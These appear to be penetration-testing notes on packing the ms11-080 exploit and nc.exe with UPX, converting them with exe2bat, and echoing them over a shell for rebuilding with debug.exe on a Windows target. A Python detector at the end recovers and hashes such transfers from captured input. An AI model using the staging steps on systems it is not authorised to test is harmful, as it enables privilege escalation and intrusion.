Py->Exe->Txt

We can turn Python scripts into exe files. Downloaded ms11-080 from exploitdb:

```
# python pyinstaller.py --onefile ms11-080.py
# upx -9 ms11-080.exe
# ls -l ms11-080.exe
```

After packing, check the size to make sure it is under 64k.

```
# wine exe2bat.exe ms11-080.exe ms11-080.txt
```

Send it over the shell and the magic bytes will auto decode to echo a new file to ms11-080.exe.

Let's pack and move nc!

```
# locate nc.exe | grep binaries
# cp /usr/share/windows-binaries/nc.exe .
# ls -l nc.exe
# upx -9 nc.exe
# ls -l nc.exe
# locate exe2bat
# cp /usr/share/windows-binaries/exe2bat.exe .
# wine exe2bat.exe nc.exe nc.txt
# head nc.txt
```

We can now transfer nc.txt to the Windows machine and then turn the file back into an exe with debug.exe. The pdf did not show this step but should be simple and easy to google.

Explanation:

Another common file transfer method employed against 32-bit Windows operating systems is the debug.exe utility. The debug.exe program acts as an assembler, disassembler, and a hex dumping tool. The concept behind the use of debug.exe for file transfers is similar to the use of scripting languages. We use non-interactive echo commands to write out the binary file in its hex value equivalents, and then use debug.exe to assemble the written text file into a binary file. There is a 64k byte size limit on the files that can be created by debug.exe. Packing with UPX lets us push larger exploits within that limit.
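Seen from the response side, the echo-then-debug.exe transfer described above leaves a recognisable trail in captured shell input, and the dropped binary can be rebuilt offline for hashing. The following is an added example, not code from the original page or from exe2bat; the sample capture is constructed, its line layout is an assumption, and `replay` and `recover` are hypothetical helper names.

```python
import hashlib
import re

# Constructed sample; the echo/debug layout is an assumption, not verified exe2bat output.
CAPTURED = """\
echo n t.dll>x.hex
echo e 0100>>x.hex
echo 4d 5a 90 00 03 00 00 00>>x.hex
echo e 0108>>x.hex
echo 04 00 00 00 ff ff 00 00>>x.hex
echo r cx>>x.hex
echo 0010>>x.hex
echo w>>x.hex
echo q>>x.hex
debug<x.hex
"""

ECHO = re.compile(r"^\s*echo\s+(.*?)\s*>{1,2}\s*(\S+)\s*$", re.I)
DEBUG = re.compile(r"^\s*debug(?:\.exe)?\s*<\s*(\S+)", re.I)

def replay(cmds):
    """Interpret the n / e / r cx subset of a debug script (data starts at 0x100); nothing is executed."""
    mem, addr, size, name, want_cx = {}, 0x100, 0, None, False
    for tok in (c.split() for c in cmds if c.strip()):
        op = tok[0].lower()
        if want_cx:                      # the line after "r cx" is the byte count
            size, want_cx = int(tok[0], 16), False
        elif op == "n":                  # output file name
            name = tok[1]
        elif op == "r":
            want_cx = True
        elif op not in ("w", "q"):       # "e ADDR" or a row of hex bytes
            if op == "e":
                addr, tok = int(tok[1], 16), tok[2:]
            mem.update((addr + i, int(b, 16)) for i, b in enumerate(tok))
            addr += len(tok)
    return name, bytes(mem.get(0x100 + i, 0) for i in range(size))

def recover(captured):
    """Return one finding per echo-built script that was fed to debug.exe."""
    scripts, findings = {}, []
    for line in captured.splitlines():
        if m := ECHO.match(line):
            scripts.setdefault(m.group(2).lower(), []).append(m.group(1))
        elif (m := DEBUG.match(line)) and m.group(1).lower() in scripts:
            name, data = replay(scripts[m.group(1).lower()])
            findings.append({"output": name, "size": len(data), "is_pe": data[:2] == b"MZ",
                             "sha256": hashlib.sha256(data).hexdigest()})
    return findings
```

A finding with `is_pe` set means an executable was assembled on the host from typed text, and the hash can be checked against known tooling.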
